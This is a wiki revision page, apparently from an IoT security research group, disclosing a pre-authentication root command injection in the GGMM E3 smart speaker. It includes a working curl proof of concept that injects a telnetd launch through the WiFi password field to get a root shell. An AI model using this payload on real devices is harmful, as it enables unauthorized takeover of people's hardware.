Difference between revisions of "GGMM E3 Smart Speaker"
0x00string (talk | contribs) (Created page with "__FORCETOC__ {{Disclaimer}} 120px|left|thumb Category:IOT =GGMM E3 Smart Speaker= "Enjoy the full rich sound by wirelessly streaming your favirote mu...") |
|||
(2 intermediate revisions by 2 users not shown) | |||
Line 10: | Line 10: | ||
== Purchase == | == Purchase == | ||
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. | Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. | ||
[https://www.amazon.com/GGMM-Speakers-Multi-Room-Bluetooth-Compatible/dp/B01E3MXHKA Purchase the GGMM E3 Smart Speaker at Amazon] | [https://www.amazon.com/GGMM-Speakers-Multi-Room-Bluetooth-Compatible/dp/B01E3MXHKA/ref=sr_1_1?s=electronics&ie=UTF8&qid=1502258299&sr=1-1&tag=exploiteers-20 Purchase the GGMM E3 Smart Speaker at Amazon] | ||
==Pre | ==Pre-Authorization Root Command Injection== | ||
A pre-authorization command injection bug exists in the main application, as the WiFi password is directly passed to a command line utility. A simple command injection via a curl request can spawn a telnet shell, as the root user with no credentials needed. | |||
Proof of Concept: | |||
<pre style="white-space: pre-wrap;"> | <pre style="white-space: pre-wrap;"> | ||
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed | curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed | ||
Line 21: | Line 22: | ||
Connect to the telnet service as root | Connect to the telnet service as root | ||
=== Demo === | |||
{{#ev:youtube|rxtb88qYanI}} |
Latest revision as of 00:44, 11 August 2017
"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."
GGMM E3 Smart Speaker
"Enjoy the full rich sound by wirelessly streaming your favirote music to GGMM E3. E3 uses Wi-Fi/ Bluetooth 4.0 technology to equally project exquisite audio wirelessly."
Purchase
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the GGMM E3 Smart Speaker at Amazon
Pre-Authorization Root Command Injection
A pre-authorization command injection bug exists in the main application, as the WiFi password is directly passed to a command line utility. A simple command injection via a curl request can spawn a telnet shell, as the root user with no credentials needed.
Proof of Concept:
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
Connect to the telnet service as root